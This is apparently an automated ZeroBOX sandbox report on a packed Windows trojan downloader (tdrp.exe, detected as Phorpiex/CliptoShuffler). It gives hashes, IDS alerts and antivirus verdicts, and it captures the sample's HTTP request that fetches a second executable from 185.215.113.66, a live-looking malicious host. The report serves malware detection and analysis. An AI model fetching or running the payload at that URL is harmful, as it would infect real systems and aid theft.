Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 12, 2024, 6:41 p.m.	Oct. 12, 2024, 6:47 p.m.

Size	86.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`21b61b3680c5e66f9f7b1f3026327757`
SHA256	`8de13f64aab532c0bbd3d38cc821ba6fa67ccfadde9cffd14944cc9d85830f4a`
CRC32	`E8E87BD5`
ssdeep	`192:MNUGDWCn+rYeumelDB2JkknJxTqth7cccccccccccccccccccccccccccccccccA:AU5C+rU9lDAJnuz`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file

tdrp.exe "C:\Users\test22\AppData\Local\Temp\tdrp.exe"
2580

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
125.253.92.50	Active	Moloch
185.215.113.66	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49161 -> 185.215.113.66:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.66:80 -> 192.168.56.101:49161	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 185.215.113.66:80 -> 192.168.56.101:49161	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.66:80 -> 192.168.56.101:49161	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 185.215.113.66:80 -> 192.168.56.101:49161	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://185.215.113.66/tdrpl.exe

Performs some HTTP requests (1 event)

request

GET http://185.215.113.66/tdrpl.exe

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\19279.scr

An executable file was downloaded by the process tdrp.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Oct. 12, 2024, 6:41 p.m.	buffer: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 12 Oct 2024 09:45:07 GMT Content-Type: application/octet-stream Content-Length: 98304 Last-Modified: Sat, 05 Oct 2024 04:09:03 GMT Connection: keep-alive ETag: "6700bbdf-18000" Accept-Ranges: bytes MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $m»pj)Ú9)Ú9)Ú9 ¢9.Ú9Q¨8+Ú9êÕC9+Ú9êÕA9(Ú9êÕ9+Ú9s9-Ú9)Ú9Ú9e9<Ú9 ¢9-Ú9 ¢95Ú9 ¢9(Ú9Rich)Ú9PEL»gà î @y@ \|0.textíî `.rdataò?@ò@@.dataH_@N2@À received: 1024 socket: 712	1	1024	0

Communicates with host for which no DNS query was performed (2 events)

host	125.253.92.50
host	185.215.113.66

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.CliptoShuffler.7!c
Cynet	Malicious (score: 99)
CAT-QuickHeal	Trojan.Cliptoshuffler
Skyhigh	Artemis!Trojan
ALYac	Gen:Variant.Lazy.208919
VIPRE	Gen:Variant.Lazy.208919
BitDefender	Gen:Variant.Lazy.208919
K7GW	Trojan-Downloader ( 005bb7791 )
K7AntiVirus	Trojan-Downloader ( 005bb7791 )
Arcabit	Trojan.Lazy.D33017
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/TrojanDownloader.Phorpiex.C
APEX	Malicious
Avast	Win32:Evo-gen [Trj]
Kaspersky	HEUR:Trojan-Banker.Win32.CliptoShuffler.gen
Alibaba	TrojanBanker:Win32/CliptoShuffler.372ca747
MicroWorld-eScan	Gen:Variant.Lazy.208919
Rising	Downloader.Phorpiex!8.D8CF (CLOUD)
Emsisoft	Gen:Variant.Lazy.208919 (B)
F-Secure	Heuristic.HEUR/AGEN.1315823
DrWeb	Trojan.Siggen29.49095
McAfeeD	ti!8DE13F64AAB5
CTX	exe.trojan.agen
Sophos	Mal/Generic-S
FireEye	Generic.mg.21b61b3680c5e66f
Webroot	W32.Trojan.Gen
Google	Detected
Avira	HEUR/AGEN.1315823
Antiy-AVL	Trojan[Banker]/Win32.CliptoShuffler
Kingsoft	malware.kb.a.1000
Gridinsoft	Ransom.Win32.Wacatac.sa
Microsoft	Trojan:Win32/Phorpiex
ZoneAlarm	HEUR:Trojan-Banker.Win32.CliptoShuffler.gen
GData	Gen:Variant.Lazy.208919
Varist	W32/ABTrojan.QLHS-7865
AhnLab-V3	Downloader/Win.Generic.C5680675
McAfee	PWS-FCEQ!21B61B3680C5
DeepInstinct	MALICIOUS
VBA32	suspected of Trojan.Downloader.gen
Malwarebytes	Trojan.Downloader
Ikarus	Trojan-Downloader.Win32.Phorpiex
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H09J924
Tencent	Win32.Trojan-Banker.Cliptoshuffler.Wdkl
Fortinet	PossibleThreat.MU
AVG	Win32:Evo-gen [Trj]
Paloalto	generic.ml
alibabacloud	Trojan[stealer]:Win/Phorpiex.C

tdrp.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All